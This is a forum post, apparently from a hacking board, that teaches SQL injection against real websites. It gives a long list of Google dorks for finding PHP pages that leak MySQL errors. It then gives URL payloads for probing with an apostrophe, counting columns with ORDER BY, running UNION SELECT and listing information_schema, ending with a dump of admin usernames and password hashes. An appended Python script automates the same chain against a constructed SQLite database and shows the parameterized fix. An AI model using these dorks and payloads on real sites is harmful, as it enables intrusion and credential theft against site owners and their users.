IMRAN YAQOOB BHUTTA (08-20-2009),nmcat1 (09-28-2009),Youtro (08-22-2013)
FIRST STEP:
The first thing you will want to do is find a proper search term (a Google dork). The intext:"Warning: ..." dorks below work because a PHP script that echoes its errors prints something like Warning: mysql_fetch_array() whenever mysql_query() has already failed; a site that shows you its database errors is exactly what the apostrophe test in step two needs. I have compiled a list:
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:material.php?id=
inurl:viewapp.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
After searching Google for one of the terms listed, open each result in its own tab.
STEP TWO:
Go through each website and simply put an apostrophe ' at the end of the link, so it looks something like:
index.php?id=23'
If a MySQL error shows up somewhere on the page, the id parameter is being dropped straight into the query without escaping, and the site is almost certainly vulnerable. (No error does not prove the site is safe; it may just have error display turned off.)
STEP THREE:
Now that you have a MySQL error, you know it's vulnerable. Next you need to find out how many columns the vulnerable query selects, because the UNION in the next step must supply exactly that many. This can be done simply by typing this at the end of the URL (make sure you remove the apostrophe): order by 100-- . So the link would look like:
index.php?id=23 order by 100--
The -- comments out whatever the script appends after your input. ORDER BY N sorts on the N-th selected column and fails when N is bigger than the number of columns, so order by 100 should give a MySQL error. Now count up from 1: as long as there is no error, the query has at least that many columns; the first value that produces a MySQL error is one more than the column count.
index.php?id=23 order by 1--
index.php?id=23 order by 2--
index.php?id=23 order by 3--
index.php?id=23 order by 4--
If the website happens to output a MySQL error at order by 4, that means there are 3 columns.
STEP FOUR
Now that you know the website has 3 columns, you will need to use a new command:
index.php?id=23 union all select 1,2,3--
Now you will need to search over the webpage for any visible numbers that you listed (1, 2 or 3). The script only prints the columns its template displays, so some numbers will never show up; if the page shows only the first row it fetched, give it an id that does not exist (id=-23) so the original row disappears and the injected row is the one rendered. Once you find a visible number,
replace that number in the URL with version(). This displays the MySQL version.
index.php?id=23 union all select 1,2,version()--
The visible number on the page will be replaced by the MySQL version string. If it's version 4.x.x, it's not worth going any further, because the information_schema views used in the next step only exist from MySQL 5.0 on. If it's version 5.x.x or later, we can proceed.
STEP FIVE
Now after finding the version is 5+, we can extract the table names with this long command:
index.php?id=23 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--
All we are doing is replacing the number 3 (the visible number on the page) with a group_concat() call, which joins every table name in the current database (table_schema=database()) into one comma-separated string so it fits in the single visible column.
After you see all the tables listed, you will want to find a table that looks like it has some good stuff in it, like admins, users, etc.
STEP SIX
Now let's say we found a table called admin. We will need another command to extract the column names within that table:
index.php?id=23 union all select 1,2,column_name from information_schema.columns where table_name='admin'--
(Wrap column_name in group_concat() as in step five if you want every column on one line instead of one per returned row.) Now we can hope it lists something like username, password. We can extract that type of information with one last simple command:
index.php?id=23 union all select 1,2,concat(username,0x3a,password) from admin--
This will now list the username and password from the admin table, separated by a colon (0x3a). The password will often be an MD5 hash. MD5 cannot be decrypted; the many "MD5 decrypters" on the internet are lookup tables of precomputed hashes, so they only recover common passwords.
BTW, sorry I reposted this; I had to because the title I used before made it so I couldn't make a link for it in my sig >_<
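Steps two through six above, as an added example that is not part of the original post: a Python script that builds an in-memory SQLite database (constructed sample data), a deliberately vulnerable page function that glues the id parameter into its query and echoes database errors the way the PHP pages behind the dorks do, a parameterized version of the same page for contrast, and the attacker-side procedure (apostrophe probe, ORDER BY column count, UNION marker search, extraction through the visible column). SQLite stands in for MySQL, so the dialect-specific pieces differ: sqlite_version() for version(), sqlite_master for information_schema.tables, pragma_table_info() for information_schema.columns and || for concat(); the MySQL form of each is noted in comments. The table and column names, the sample rows, the hash and the page template are all constructed for this example. It also uses two refinements the post does not mention: a nonexistent id so only the injected row renders, and distinctive string markers instead of bare 1,2,3.

```python
import sqlite3

# ---------------------------------------------------------------------------
# Target side (constructed for this example): a "product page" with the bug
# class the dorks above hunt for. The id parameter is concatenated into the
# SQL string, and a failed query is echoed into the HTML, just as a PHP page
# prints "Warning: mysql_fetch_array()" after mysql_query() has failed.
# ---------------------------------------------------------------------------

def build_db() -> sqlite3.Connection:
    """Constructed sample data; the hash is md5('password')."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, descr TEXT);
        INSERT INTO products VALUES (23, 'Widget', 'A fine widget');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d67dbf2dcfdcd8d1a8');
    """)
    return db

DB = build_db()

def render(rows) -> str:
    # Only columns 2 and 3 reach the HTML; column 1 (id) is never displayed.
    return "".join(f"<h1>{name}</h1><p>{descr}</p>" for _id, name, descr in rows)

def vulnerable_page(id_param: str) -> str:
    """index.php?id=<id_param>, query built by string concatenation (the bug)."""
    sql = "SELECT id, name, descr FROM products WHERE id=" + id_param
    try:
        return render(DB.execute(sql).fetchall())
    except sqlite3.Error as err:
        return f"<b>Warning</b>: query failed: {err}"

def safe_page(id_param: str) -> str:
    """Same page with a bound parameter: the input can never alter the query."""
    rows = DB.execute("SELECT id, name, descr FROM products WHERE id=?", (id_param,))
    return render(rows.fetchall())

# ---------------------------------------------------------------------------
# Attacker side. `page` is any callable that takes the raw id parameter and
# returns the HTML; against a real target it would be an HTTP GET.
# ---------------------------------------------------------------------------

ERROR_MARK = "Warning"

def is_injectable(page, base_id: str) -> bool:
    """STEP TWO: a stray apostrophe breaks the SQL and surfaces as an error."""
    return ERROR_MARK in page(base_id + "'")

def count_columns(page, base_id: str, limit: int = 50) -> int:
    """STEP THREE: ORDER BY n works while n <= number of selected columns;
    the first n that fails means the query selects n-1 columns."""
    for n in range(1, limit + 1):
        if ERROR_MARK in page(f"{base_id} order by {n}--"):
            return n - 1
    raise RuntimeError(f"more than {limit} columns")

def find_visible_columns(page, base_id: str, ncols: int) -> list:
    """STEP FOUR: UNION a row of distinctive markers and see which appear.
    A nonexistent id (-23) empties the original result so the injected row is
    the only thing rendered; string markers beat bare 1,2,3 because a lone
    digit may already occur somewhere on the page."""
    markers = [f"zz{i}zz" for i in range(1, ncols + 1)]
    html = page(f"-{base_id} union all select " + ",".join(f"'{m}'" for m in markers) + "--")
    return [i for i, m in enumerate(markers, start=1) if m in html]

def extract(page, base_id: str, ncols: int, column: int, expr: str, from_clause: str = ""):
    """Place an SQL expression in the visible column, wrapped in @@ so it can be
    cut back out of the HTML. SQLite's || is MySQL's concat()."""
    cols = ["'x'"] * ncols
    cols[column - 1] = f"'@@' || ({expr}) || '@@'"
    html = page(f"-{base_id} union all select {','.join(cols)} {from_clause}--")
    parts = html.split("@@")
    return parts[1] if len(parts) >= 3 else None   # None when the expression was NULL

def run_attack(page, base_id: str = "23"):
    """STEPS TWO to SIX end to end; None if the apostrophe test fails."""
    if not is_injectable(page, base_id):
        return None
    ncols = count_columns(page, base_id)
    col = find_visible_columns(page, base_id, ncols)[-1]
    # MySQL equivalents of the four expressions below: version();
    # group_concat(table_name) from information_schema.tables where table_schema=database();
    # group_concat(column_name) from information_schema.columns where table_name='admin';
    # concat(username,0x3a,password) from admin.
    return {
        "columns": ncols,
        "visible": col,
        "version": extract(page, base_id, ncols, col, "sqlite_version()"),
        "tables": extract(page, base_id, ncols, col, "group_concat(name)",
                          "from sqlite_master where type='table'"),
        "admin_columns": extract(page, base_id, ncols, col, "group_concat(name)",
                                 "from pragma_table_info('admin')"),
        "creds": extract(page, base_id, ncols, col,
                         "group_concat(username || ':' || password)", "from admin"),
    }

if __name__ == "__main__":
    print(run_attack(vulnerable_page))   # full dump, ending in admin:<md5 hash>
    print(run_attack(safe_page))         # None: the bound parameter never breaks the query
```

Running it against vulnerable_page walks the whole chain and ends with admin:5f4dcc3b5aa765d67dbf2dcfdcd8d1a8; against safe_page the apostrophe probe returns a normal empty page, so run_attack stops at None. The only difference between the two page functions is the bound parameter, which is the fix for every site the dork list above turns up.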
Very informative post. Thanks for taking the time to share your view with us.
Epic BUMP lol
Seems like it's lacking the 'advanced' part.